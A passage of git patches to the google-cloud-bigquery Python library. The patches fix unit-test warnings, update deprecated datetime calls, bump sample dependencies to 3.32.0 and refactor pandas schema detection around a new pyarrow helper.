mock.create_autospec(bigquery.Client) + mock_client.project = "test-proj" + mock_api_request = mock.Mock() + schema = [ + bigquery.SchemaField("geo_col", "GEOGRAPHY"), + bigquery.SchemaField("bool_col", "BOOLEAN"), + bigquery.SchemaField("int_col", "INTEGER"), + bigquery.SchemaField("float_col", "FLOAT"), + bigquery.SchemaField("string_col", "STRING"), + ] + rows = class_under_test(mock_client, mock_api_request, TEST_PATH, schema) + + mock_df = pandas.DataFrame( + { + "geo_col": ["POINT (1 2)"], + "bool_col": [True], + "int_col": [123], + "float_col": [1.23], + "string_col": ["abc"], + } + ) + rows.to_dataframe = mock.Mock(return_value=mock_df) + + rows.to_geodataframe(geography_column="geo_col") + + rows.to_dataframe.assert_called_once_with( + None, # bqstorage_client + None, # dtypes + None, # progress_bar_type + True, # create_bqstorage_client + geography_as_object=True, + bool_dtype=bigquery.enums.DefaultPandasDTypes.BOOL_DTYPE, + int_dtype=bigquery.enums.DefaultPandasDTypes.INT_DTYPE, + float_dtype=None, + string_dtype=None, + ) + mock_geopandas.GeoDataFrame.assert_called_once_with( + mock_df, crs="EPSG:4326", geometry="geo_col" + ) + + +@mock.patch("google.cloud.bigquery.table.geopandas") +def test_rowiterator_to_geodataframe_with_custom_dtypes( + mock_geopandas, monkeypatch, class_under_test +): + mock_geopandas.GeoDataFrame = mock.Mock(spec=True) + mock_client = mock.create_autospec(bigquery.Client) + mock_client.project = "test-proj" + mock_api_request = mock.Mock() + schema = [ + bigquery.SchemaField("geo_col", "GEOGRAPHY"), + bigquery.SchemaField("bool_col", "BOOLEAN"), + bigquery.SchemaField("int_col", "INTEGER"), + bigquery.SchemaField("float_col", "FLOAT"), + bigquery.SchemaField("string_col", "STRING"), + ] + rows = class_under_test(mock_client, mock_api_request, TEST_PATH, schema) + + mock_df = pandas.DataFrame( + { + "geo_col": ["POINT (3 4)"], + "bool_col": [False], + "int_col": [456], + "float_col": [4.56], + "string_col": ["def"], + } + ) + rows.to_dataframe = mock.Mock(return_value=mock_df) + + custom_bool_dtype = "bool" + custom_int_dtype = "int32" + custom_float_dtype = "float32" + custom_string_dtype = "string" + + rows.to_geodataframe( + geography_column="geo_col", + bool_dtype=custom_bool_dtype, + int_dtype=custom_int_dtype, + float_dtype=custom_float_dtype, + string_dtype=custom_string_dtype, + ) + + rows.to_dataframe.assert_called_once_with( + None, # bqstorage_client + None, # dtypes + None, # progress_bar_type + True, # create_bqstorage_client + geography_as_object=True, + bool_dtype=custom_bool_dtype, + int_dtype=custom_int_dtype, + float_dtype=custom_float_dtype, + string_dtype=custom_string_dtype, + ) + mock_geopandas.GeoDataFrame.assert_called_once_with( + mock_df, crs="EPSG:4326", geometry="geo_col" + ) From 2140a51bac95ab600759bdee576cf3a41c7dc834 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 14 May 2025 13:59:44 -0400 Subject: [PATCH 101/202] chore: Fix two types of warnings in unit tests (#2183) * Fix two types of warnings in unit tests This commit addresses two warnings that appear when running unit tests: 1. `PytestRemovedIn9Warning` in `tests/unit/test_opentelemetry_tracing.py`: Removed a `@pytest.mark.skipif` decorator from a fixture. The skip condition is already present on the test methods using the fixture. 2. `FutureWarning` in `tests/unit/test_client.py`: Updated calls to `client.query()` to include `job_retry=None` when `job_id` is also specified. This is to avoid ambiguity as BigQuery cannot retry a failed job with the exact same ID. * Update tests/unit/test_client.py * Update tests/unit/test_client.py * Update linting * adds more examples of functions where job_retry is needed --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- tests/unit/test_client.py | 52 ++++++++++++++++++------ tests/unit/test_opentelemetry_tracing.py | 1 - 2 files changed, 39 insertions(+), 14 deletions(-) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index b8140df66..a35338698 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -4719,7 +4719,7 @@ def test_query_w_api_method_query_and_job_id_fails(self): client._connection = make_connection({}) with self.assertRaises(TypeError) as exc: - client.query(query, job_id="abcd", api_method="QUERY") + client.query(query, job_id="abcd", api_method="QUERY", job_retry=None) self.assertIn( "`job_id` was provided, but the 'QUERY' `api_method` was requested", exc.exception.args[0], @@ -4774,7 +4774,11 @@ def test_query_w_explicit_project(self): conn = client._connection = make_connection(resource) client.query( - query, job_id=job_id, project="other-project", location=self.LOCATION + query, + job_id=job_id, + project="other-project", + location=self.LOCATION, + job_retry=None, ) # Check that query actually starts the job. @@ -4833,7 +4837,11 @@ def test_query_w_explicit_job_config(self): original_config_copy = copy.deepcopy(job_config) client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) # Check that query actually starts the job. @@ -4884,7 +4892,11 @@ def test_query_preserving_explicit_job_config(self): original_config_copy = copy.deepcopy(job_config) client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) # Check that query actually starts the job. @@ -4940,7 +4952,13 @@ def test_query_preserving_explicit_default_job_config(self): ) conn = client._connection = make_connection(resource) - client.query(query, job_id=job_id, location=self.LOCATION, job_config=None) + client.query( + query, + job_id=job_id, + location=self.LOCATION, + job_config=None, + job_retry=None, + ) # Check that query actually starts the job. conn.api_request.assert_called_once_with( @@ -4978,7 +4996,11 @@ def test_query_w_invalid_job_config(self): with self.assertRaises(TypeError) as exc: client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) self.assertIn("Expected an instance of QueryJobConfig", exc.exception.args[0]) @@ -5027,7 +5049,11 @@ def test_query_w_explicit_job_config_override(self): job_config.default_dataset = None client.query( - query, job_id=job_id, location=self.LOCATION, job_config=job_config + query, + job_id=job_id, + location=self.LOCATION, + job_config=job_config, + job_retry=None, ) # Check that query actually starts the job. @@ -5072,7 +5098,7 @@ def test_query_w_client_default_config_no_incoming(self): ) conn = client._connection = make_connection(resource) - client.query(query, job_id=job_id, location=self.LOCATION) + client.query(query, job_id=job_id, location=self.LOCATION, job_retry=None) # Check that query actually starts the job. conn.api_request.assert_called_once_with( @@ -5114,7 +5140,7 @@ def test_query_w_client_location(self): ) conn = client._connection = make_connection(resource) - client.query(query, job_id=job_id, project="other-project") + client.query(query, job_id=job_id, project="other-project", job_retry=None) # Check that query actually starts the job. conn.api_request.assert_called_once_with( @@ -5178,7 +5204,7 @@ def test_query_w_udf_resources(self): config.udf_resources = udf_resources config.use_legacy_sql = True - job = client.query(QUERY, job_config=config, job_id=JOB) + job = client.query(QUERY, job_config=config, job_id=JOB, job_retry=None) self.assertIsInstance(job, QueryJob) self.assertIs(job._client, client) @@ -5234,7 +5260,7 @@ def test_query_w_query_parameters(self): config = QueryJobConfig() config.query_parameters = query_parameters - job = client.query(QUERY, job_config=config, job_id=JOB) + job = client.query(QUERY, job_config=config, job_id=JOB, job_retry=None) self.assertIsInstance(job, QueryJob) self.assertIs(job._client, client) @@ -5277,7 +5303,7 @@ def test_query_job_rpc_fail_w_random_error(self): ) with job_begin_patcher: with pytest.raises(Unknown, match="Not sure what went wrong."): - client.query("SELECT 1;", job_id="123") + client.query("SELECT 1;", job_id="123", job_retry=None) def test_query_job_rpc_fail_w_conflict_job_id_given(self): from google.api_core.exceptions import Conflict @@ -5293,7 +5319,7 @@ def test_query_job_rpc_fail_w_conflict_job_id_given(self): ) with job_begin_patcher: with pytest.raises(Conflict, match="Job already exists."): - client.query("SELECT 1;", job_id="123") + client.query("SELECT 1;", job_id="123", job_retry=None) def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails(self): from google.api_core.exceptions import Conflict diff --git a/tests/unit/test_opentelemetry_tracing.py b/tests/unit/test_opentelemetry_tracing.py index 546cc02bd..57132a1b9 100644 --- a/tests/unit/test_opentelemetry_tracing.py +++ b/tests/unit/test_opentelemetry_tracing.py @@ -42,7 +42,6 @@ TEST_SPAN_ATTRIBUTES = {"foo": "baz"} -@pytest.mark.skipif(opentelemetry is None, reason="Require `opentelemetry`") @pytest.fixture def setup(): importlib.reload(opentelemetry_tracing) From 110ad603cf61566c3421e26a028d897135e526d3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 14 May 2025 20:42:29 +0200 Subject: [PATCH 102/202] chore(deps): update all dependencies to v3.32.0 (#2179) Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- samples/snippets/requirements.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index b98f4ace9..743d0fe35 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 3ff1b2944..434a594cb 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,7 +12,7 @@ geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 google-auth==2.40.1 -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index b000aa50c..bb60f2a67 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.9.0 db-dtypes==1.4.3 -google.cloud.bigquery==3.31.0 +google.cloud.bigquery==3.32.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index d80ffcd09..17f43bf78 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ bigquery-magics==0.9.0 db-dtypes==1.4.3 -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' ipython==9.2.0; python_version >= '3.10' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 4b88c6b70..c31815d69 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.31.0 +google-cloud-bigquery==3.32.0 From 5805066d9dfb696e7f514569567a5432ee98ad2b Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 15 May 2025 05:11:00 -0400 Subject: [PATCH 103/202] refactor: Fix DeprecationWarnings for datetime methods in job tests (#2185) * Fix DeprecationWarnings for datetime methods in job tests Replaced calls to deprecated `datetime.datetime.utcnow()` with `datetime.datetime.now(datetime.UTC)` in `tests/unit/job/test_base.py`. Replaced calls to deprecated `datetime.datetime.utcfromtimestamp()` with `datetime.datetime.fromtimestamp(timestamp, datetime.UTC)` in `tests/unit/job/helpers.py`. These changes address the specific warnings identified in the issue for these two files. * Update tests/unit/job/test_base.py * Update tests/unit/job/test_base.py * Updates datetime code related to UTC --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- tests/unit/job/helpers.py | 4 +++- tests/unit/job/test_base.py | 2 +- tests/unit/test__pandas_helpers.py | 2 +- tests/unit/test_client.py | 17 ++++++++--------- tests/unit/test_dataset.py | 4 +++- tests/unit/test_query.py | 17 +++++++++-------- tests/unit/test_table.py | 8 ++++++-- 7 files changed, 31 insertions(+), 23 deletions(-) diff --git a/tests/unit/job/helpers.py b/tests/unit/job/helpers.py index 3642c7229..24ba2fa99 100644 --- a/tests/unit/job/helpers.py +++ b/tests/unit/job/helpers.py @@ -106,7 +106,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.006 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.ETAG = "ETAG" self.FULL_JOB_ID = "%s:%s" % (self.PROJECT, self.JOB_ID) self.RESOURCE_URL = "{}/bigquery/v2/projects/{}/jobs/{}".format( diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index 2d2f0c13c..22a0fa450 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -331,7 +331,7 @@ def _datetime_and_millis(): import datetime from google.cloud._helpers import _millis - now = datetime.datetime.utcnow().replace( + now = datetime.datetime.now(datetime.timezone.utc).replace( microsecond=123000, tzinfo=datetime.timezone.utc, # stats timestamps have ms precision ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 48c085c1d..d6ea5df7e 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -886,7 +886,7 @@ def test_list_columns_and_indexes_with_named_index_same_as_column_name( @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_json_generator(module_under_test): - utcnow = datetime.datetime.utcnow() + utcnow = datetime.datetime.now(datetime.timezone.utc) dataframe = pandas.DataFrame( { "a_series": [1, 2, 3, 4], diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index a35338698..468068321 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5853,7 +5853,7 @@ def test_insert_rows_w_schema(self): from google.cloud.bigquery.schema import SchemaField WHEN_TS = 1437767599.006 - WHEN = datetime.datetime.utcfromtimestamp(WHEN_TS).replace(tzinfo=UTC) + WHEN = datetime.datetime.fromtimestamp(WHEN_TS, UTC).replace(tzinfo=UTC) PATH = "projects/%s/datasets/%s/tables/%s/insertAll" % ( self.PROJECT, self.DS_ID, @@ -5914,7 +5914,7 @@ def test_insert_rows_w_list_of_dictionaries(self): from google.cloud.bigquery.table import Table WHEN_TS = 1437767599.006 - WHEN = datetime.datetime.utcfromtimestamp(WHEN_TS).replace(tzinfo=UTC) + WHEN = datetime.datetime.fromtimestamp(WHEN_TS, UTC).replace(tzinfo=UTC) PATH = "projects/%s/datasets/%s/tables/%s/insertAll" % ( self.PROJECT, self.DS_ID, @@ -6097,6 +6097,7 @@ def _row_data(row): ) def test_insert_rows_w_repeated_fields(self): + from google.cloud._helpers import UTC from google.cloud.bigquery.schema import SchemaField from google.cloud.bigquery.table import Table @@ -6126,12 +6127,8 @@ def test_insert_rows_w_repeated_fields(self): ( 12, [ - datetime.datetime( - 2018, 12, 1, 12, 0, 0, tzinfo=datetime.timezone.utc - ), - datetime.datetime( - 2018, 12, 1, 13, 0, 0, tzinfo=datetime.timezone.utc - ), + datetime.datetime(2018, 12, 1, 12, 0, 0, tzinfo=UTC), + datetime.datetime(2018, 12, 1, 13, 0, 0, tzinfo=UTC), ], [1.25, 2.5], ), @@ -6966,7 +6963,9 @@ def test_list_rows(self): ) WHEN_TS = 1437767599006000 - WHEN = datetime.datetime.utcfromtimestamp(WHEN_TS / 1e6).replace(tzinfo=UTC) + WHEN = datetime.datetime.fromtimestamp( + WHEN_TS / 1e6, datetime.timezone.utc + ).replace(tzinfo=UTC) WHEN_1 = WHEN + datetime.timedelta(microseconds=1) WHEN_2 = WHEN + datetime.timedelta(microseconds=2) ROWS = 1234 diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 5cce2a9a7..3fd2579af 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -945,7 +945,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.006 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.ETAG = "ETAG" self.DS_FULL_ID = "%s:%s" % (self.PROJECT, self.DS_ID) self.RESOURCE_URL = "http://example.com/path/to/resource" diff --git a/tests/unit/test_query.py b/tests/unit/test_query.py index 40ef080f7..0d967bdb8 100644 --- a/tests/unit/test_query.py +++ b/tests/unit/test_query.py @@ -637,9 +637,9 @@ def test_to_api_repr_w_timestamp_datetime(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_timestamp_micros(self): - from google.cloud._helpers import _microseconds_from_datetime + from google.cloud._helpers import _microseconds_from_datetime, UTC - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) seconds = _microseconds_from_datetime(now) / 1.0e6 EXPECTED = { "parameterType": {"type": "TIMESTAMP"}, @@ -650,9 +650,9 @@ def test_to_api_repr_w_timestamp_micros(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_datetime_datetime(self): - from google.cloud._helpers import _datetime_to_rfc3339 + from google.cloud._helpers import _datetime_to_rfc3339, UTC - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) EXPECTED = { "parameterType": {"type": "DATETIME"}, "parameterValue": { @@ -664,9 +664,9 @@ def test_to_api_repr_w_datetime_datetime(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_datetime_string(self): - from google.cloud._helpers import _datetime_to_rfc3339 + from google.cloud._helpers import _datetime_to_rfc3339, UTC - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) now_str = _datetime_to_rfc3339(now) EXPECTED = { "parameterType": {"type": "DATETIME"}, @@ -1047,9 +1047,10 @@ def test_to_api_repr_w_datetime_str(self): self.assertEqual(param.to_api_repr(), EXPECTED) def test_to_api_repr_w_datetime_datetime(self): + from google.cloud._helpers import UTC # type: ignore from google.cloud.bigquery._helpers import _RFC3339_MICROS_NO_ZULU - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) now_str = now.strftime(_RFC3339_MICROS_NO_ZULU) EXPECTED = { "parameterType": { @@ -1089,7 +1090,7 @@ def test_to_api_repr_w_timestamp_str(self): def test_to_api_repr_w_timestamp_timestamp(self): from google.cloud._helpers import UTC # type: ignore - now = datetime.datetime.utcnow() + now = datetime.datetime.now(UTC) now = now.astimezone(UTC) now_str = str(now) EXPECTED = { diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 8daa4ce43..92fa0e2ec 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -395,7 +395,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.006 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.ETAG = "ETAG" self.TABLE_FULL_ID = "%s:%s.%s" % (self.PROJECT, self.DS_ID, self.TABLE_NAME) self.RESOURCE_URL = "http://example.com/path/to/resource" @@ -1952,7 +1954,9 @@ def _setUpConstants(self): from google.cloud._helpers import UTC self.WHEN_TS = 1437767599.125 - self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(tzinfo=UTC) + self.WHEN = datetime.datetime.fromtimestamp(self.WHEN_TS, UTC).replace( + tzinfo=UTC + ) self.EXP_TIME = datetime.datetime(2015, 8, 1, 23, 59, 59, tzinfo=UTC) def test_ctor(self): From 7ec2848379d5743bbcb36700a1153540c451e0e0 Mon Sep 17 00:00:00 2001 From: Chelsea Lin Date: Mon, 19 May 2025 10:52:16 -0700 Subject: [PATCH 104/202] fix: ensure SchemaField.field_dtype returns a string (#2188) * fix: ensure SchemaField.field_dtype returns a string * fix cover tests * fix unit 3.9 --- google/cloud/bigquery/_pandas_helpers.py | 154 ++++++++++------------- google/cloud/bigquery/schema.py | 28 ++--- tests/unit/test__pandas_helpers.py | 113 ++++++----------- tests/unit/test_schema.py | 5 - 4 files changed, 113 insertions(+), 187 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 457eb9078..6691e7ef6 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -508,31 +508,37 @@ def dataframe_to_bq_schema(dataframe, bq_schema): bq_schema_unused = set() bq_schema_out = [] - unknown_type_fields = [] - + unknown_type_columns = [] + dataframe_reset_index = dataframe.reset_index() for column, dtype in list_columns_and_indexes(dataframe): - # Use provided type from schema, if present. + # Step 1: use provided type from schema, if present. bq_field = bq_schema_index.get(column) if bq_field: bq_schema_out.append(bq_field) bq_schema_unused.discard(bq_field.name) continue - # Otherwise, try to automatically determine the type based on the + # Step 2: try to automatically determine the type based on the # pandas dtype. bq_type = _PANDAS_DTYPE_TO_BQ.get(dtype.name) if bq_type is None: - sample_data = _first_valid(dataframe.reset_index()[column]) + sample_data = _first_valid(dataframe_reset_index[column]) if ( isinstance(sample_data, _BaseGeometry) and sample_data is not None # Paranoia ): bq_type = "GEOGRAPHY" - bq_field = schema.SchemaField(column, bq_type) - bq_schema_out.append(bq_field) + if bq_type is not None: + bq_schema_out.append(schema.SchemaField(column, bq_type)) + continue + + # Step 3: try with pyarrow if available + bq_field = _get_schema_by_pyarrow(column, dataframe_reset_index[column]) + if bq_field is not None: + bq_schema_out.append(bq_field) + continue - if bq_field.field_type is None: - unknown_type_fields.append(bq_field) + unknown_type_columns.append(column) # Catch any schema mismatch. The developer explicitly asked to serialize a # column, but it was not found. @@ -543,98 +549,70 @@ def dataframe_to_bq_schema(dataframe, bq_schema): ) ) - # If schema detection was not successful for all columns, also try with - # pyarrow, if available. - if unknown_type_fields: - if not pyarrow: - msg = "Could not determine the type of columns: {}".format( - ", ".join(field.name for field in unknown_type_fields) - ) - warnings.warn(msg) - return None # We cannot detect the schema in full. - - # The augment_schema() helper itself will also issue unknown type - # warnings if detection still fails for any of the fields. - bq_schema_out = augment_schema(dataframe, bq_schema_out) + if unknown_type_columns != []: + msg = "Could not determine the type of columns: {}".format( + ", ".join(unknown_type_columns) + ) + warnings.warn(msg) + return None # We cannot detect the schema in full. - return tuple(bq_schema_out) if bq_schema_out else None + return tuple(bq_schema_out) -def augment_schema(dataframe, current_bq_schema): - """Try to deduce the unknown field types and return an improved schema. +def _get_schema_by_pyarrow(name, series): + """Attempt to detect the type of the given series by leveraging PyArrow's + type detection capabilities. - This function requires ``pyarrow`` to run. If all the missing types still - cannot be detected, ``None`` is returned. If all types are already known, - a shallow copy of the given schema is returned. + This function requires the ``pyarrow`` library to be installed and + available. If the series type cannot be determined or ``pyarrow`` is not + available, ``None`` is returned. Args: - dataframe (pandas.DataFrame): - DataFrame for which some of the field types are still unknown. - current_bq_schema (Sequence[google.cloud.bigquery.schema.SchemaField]): - A BigQuery schema for ``dataframe``. The types of some or all of - the fields may be ``None``. + name (str): + the column name of the SchemaField. + series (pandas.Series): + The Series data for which to detect the data type. Returns: - Optional[Sequence[google.cloud.bigquery.schema.SchemaField]] + Optional[google.cloud.bigquery.schema.SchemaField]: + A tuple containing the BigQuery-compatible type string (e.g., + "STRING", "INTEGER", "TIMESTAMP", "DATETIME", "NUMERIC", "BIGNUMERIC") + and the mode string ("NULLABLE", "REPEATED"). + Returns ``None`` if the type cannot be determined or ``pyarrow`` + is not imported. """ - # pytype: disable=attribute-error - augmented_schema = [] - unknown_type_fields = [] - for field in current_bq_schema: - if field.field_type is not None: - augmented_schema.append(field) - continue - - arrow_table = pyarrow.array(dataframe.reset_index()[field.name]) - - if pyarrow.types.is_list(arrow_table.type): - # `pyarrow.ListType` - detected_mode = "REPEATED" - detected_type = _pyarrow_helpers.arrow_scalar_ids_to_bq( - arrow_table.values.type.id - ) - - # For timezone-naive datetimes, pyarrow assumes the UTC timezone and adds - # it to such datetimes, causing them to be recognized as TIMESTAMP type. - # We thus additionally check the actual data to see if we need to overrule - # that and choose DATETIME instead. - # Note that this should only be needed for datetime values inside a list, - # since scalar datetime values have a proper Pandas dtype that allows - # distinguishing between timezone-naive and timezone-aware values before - # even requiring the additional schema augment logic in this method. - if detected_type == "TIMESTAMP": - valid_item = _first_array_valid(dataframe[field.name]) - if isinstance(valid_item, datetime) and valid_item.tzinfo is None: - detected_type = "DATETIME" - else: - detected_mode = field.mode - detected_type = _pyarrow_helpers.arrow_scalar_ids_to_bq(arrow_table.type.id) - if detected_type == "NUMERIC" and arrow_table.type.scale > 9: - detected_type = "BIGNUMERIC" - if detected_type is None: - unknown_type_fields.append(field) - continue + if not pyarrow: + return None - new_field = schema.SchemaField( - name=field.name, - field_type=detected_type, - mode=detected_mode, - description=field.description, - fields=field.fields, - ) - augmented_schema.append(new_field) + arrow_table = pyarrow.array(series) + if pyarrow.types.is_list(arrow_table.type): + # `pyarrow.ListType` + mode = "REPEATED" + type = _pyarrow_helpers.arrow_scalar_ids_to_bq(arrow_table.values.type.id) + + # For timezone-naive datetimes, pyarrow assumes the UTC timezone and adds + # it to such datetimes, causing them to be recognized as TIMESTAMP type. + # We thus additionally check the actual data to see if we need to overrule + # that and choose DATETIME instead. + # Note that this should only be needed for datetime values inside a list, + # since scalar datetime values have a proper Pandas dtype that allows + # distinguishing between timezone-naive and timezone-aware values before + # even requiring the additional schema augment logic in this method. + if type == "TIMESTAMP": + valid_item = _first_array_valid(series) + if isinstance(valid_item, datetime) and valid_item.tzinfo is None: + type = "DATETIME" + else: + mode = "NULLABLE" # default mode + type = _pyarrow_helpers.arrow_scalar_ids_to_bq(arrow_table.type.id) + if type == "NUMERIC" and arrow_table.type.scale > 9: + type = "BIGNUMERIC" - if unknown_type_fields: - warnings.warn( - "Pyarrow could not determine the type of columns: {}.".format( - ", ".join(field.name for field in unknown_type_fields) - ) - ) + if type is not None: + return schema.SchemaField(name, type, mode) + else: return None - return augmented_schema - # pytype: enable=attribute-error - def dataframe_to_arrow(dataframe, bq_schema): """Convert pandas dataframe to Arrow table, using BigQuery schema. diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 749b0a00e..1f1aab7a4 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -284,15 +284,13 @@ def name(self): return self._properties.get("name", "") @property - def field_type(self): + def field_type(self) -> str: """str: The type of the field. See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableFieldSchema.FIELDS.type """ type_ = self._properties.get("type") - if type_ is None: # Shouldn't happen, but some unit tests do this. - return None return cast(str, type_).upper() @property @@ -397,20 +395,16 @@ def _key(self): Returns: Tuple: The contents of this :class:`~google.cloud.bigquery.schema.SchemaField`. """ - field_type = self.field_type.upper() if self.field_type is not None else None - - # Type can temporarily be set to None if the code needs a SchemaField instance, - # but has not determined the exact type of the field yet. - if field_type is not None: - if field_type == "STRING" or field_type == "BYTES": - if self.max_length is not None: - field_type = f"{field_type}({self.max_length})" - elif field_type.endswith("NUMERIC"): - if self.precision is not None: - if self.scale is not None: - field_type = f"{field_type}({self.precision}, {self.scale})" - else: - field_type = f"{field_type}({self.precision})" + field_type = self.field_type + if field_type == "STRING" or field_type == "BYTES": + if self.max_length is not None: + field_type = f"{field_type}({self.max_length})" + elif field_type.endswith("NUMERIC"): + if self.precision is not None: + if self.scale is not None: + field_type = f"{field_type}({self.precision}, {self.scale})" + else: + field_type = f"{field_type}({self.precision})" policy_tags = ( None if self.policy_tags is None else tuple(sorted(self.policy_tags.names)) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index d6ea5df7e..d87c65581 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -1568,31 +1568,7 @@ def test_augment_schema_type_detection_succeeds(module_under_test): # set to "datetime64[ns]", and pyarrow converts that to pyarrow.TimestampArray. # We thus cannot expect to get a DATETIME date when converting back to the # BigQuery type. - - current_schema = ( - schema.SchemaField("bool_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("int_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("float_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("time_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("timestamp_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("date_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("bytes_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("string_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("numeric_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("bignumeric_field", field_type=None, mode="NULLABLE"), - ) - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - - # there should be no relevant warnings - unwanted_warnings = [ - warning for warning in warned if "Pyarrow could not" in str(warning) - ] - assert not unwanted_warnings - - # the augmented schema must match the expected - expected_schema = ( + expected_schemas = ( schema.SchemaField("bool_field", field_type="BOOL", mode="NULLABLE"), schema.SchemaField("int_field", field_type="INT64", mode="NULLABLE"), schema.SchemaField("float_field", field_type="FLOAT64", mode="NULLABLE"), @@ -1607,8 +1583,13 @@ def test_augment_schema_type_detection_succeeds(module_under_test): ), ) - by_name = operator.attrgetter("name") - assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name) + for col_name, expected_schema in zip(dataframe, expected_schemas): + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field == expected_schema @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @@ -1639,30 +1620,20 @@ def test_augment_schema_repeated_fields(module_under_test): ] ) - current_schema = ( - schema.SchemaField("string_array", field_type=None, mode="NULLABLE"), - 